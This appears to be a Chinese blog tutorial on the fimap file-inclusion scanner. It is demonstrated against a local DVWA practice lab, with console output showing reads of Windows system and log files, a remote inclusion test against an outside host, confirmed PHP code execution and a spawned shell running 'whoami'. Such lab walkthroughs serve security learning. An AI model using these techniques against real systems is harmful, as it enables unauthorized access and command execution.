文件包含漏洞检测工具fimap - 安全工具篇

2019-04-22  本文已影响0人  DreamsonMa

原理和渗透方式瞄瞄这个:新手指南:DVWA-1.9全级别教程之File Inclusion




➜  ~ fimap -u "" --cookie="security=medium; PHPSESSID=b2i1bqt4mvna2faanq5jq5rm62" 
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: ''
[02:11:10] [OUT] Inspecting URL ''...
[02:11:10] [INFO] Fiddling around with URL...
[02:11:10] [OUT] [PHP] Possible file inclusion found! -> '' with Parameter 'page'.
[02:11:10] [OUT] [PHP] Identifying Vulnerability '' with Parameter 'page'...
[02:11:10] [INFO] Scriptpath received: 'D:\xampp\htdocs\DVWA\vulnerabilities\fi'
[02:11:10] [INFO] Operating System is 'Windows'.
[02:11:10] [INFO] Testing file 'c:\boot.ini'...
[02:11:10] [INFO] Testing file 'c:\windows\win.ini'...
[02:11:10] [INFO] Testing file 'php://input'...
[02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access.log'...
[02:11:10] [WARN] HTTP Error 400: Bad Request
[02:11:10] [INFO] Testing file 'C:\Program Files\Apache Group\Apache\logs\access_log'...
[02:11:10] [WARN] HTTP Error 400: Bad Request
[02:11:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
#[1] Possible PHP-File Inclusion                                                 #
#::REQUEST                                                                       #
#  [URL]    #
#  [HEAD SENT]  Cookie                                                           #
#::VULN INFO                                                                     #
#  [GET PARAM]  page                                                             #
#  [PATH]       D:\xampp\htdocs\DVWA\vulnerabilities\fi                          #
#  [OS]         Windows                                                          #
#  [TYPE]       Absolute Clean                                                   #
#  [TRUNCATION] No Need. It's clean.                                             #
#  [READABLE FILES]                                                              #
#                   [0] c:\windows\win.ini                                       #
#                   [1] php://input                                              #


➜  ~ fimap -X                                                                                                                                  
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

#:: List of Domains ::    #
#[1]       #
#[q] Quit                 #
Choose Domain: 1
#:: FI Bugs on '' ::                                                                            #
#[1] URL: '/DVWA/vulnerabilities/fi/?page=file3.php' injecting file: 'php://input' using GET-param: 'page'    #
#[q] Quit                                                                                                     #
Choose vulnerable script: 1
[02:16:01] [INFO] Testing PHP-code injection thru POST...
[02:16:01] [OUT] PHP Injection works! Testing if execution works...
[02:16:01] [INFO] Testing execution thru 'popen[b64][win]'...
[02:16:02] [OUT] Execution thru 'popen[b64][win]' works!
#:: Available Attacks - PHP and SHELL access ::    #
#[1] Spawn fimap shell                             #
#[2] [Test Plugin] Show some info                  #
#[q] Quit                                          #
Choose Attack: 1
Please wait - Setting up shell (one request)...
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
fishell@MAJX2:D:\xampp\htdocs\DVWA\vulnerabilities\fi$> whoami

更详细参数通过 -h 查看。



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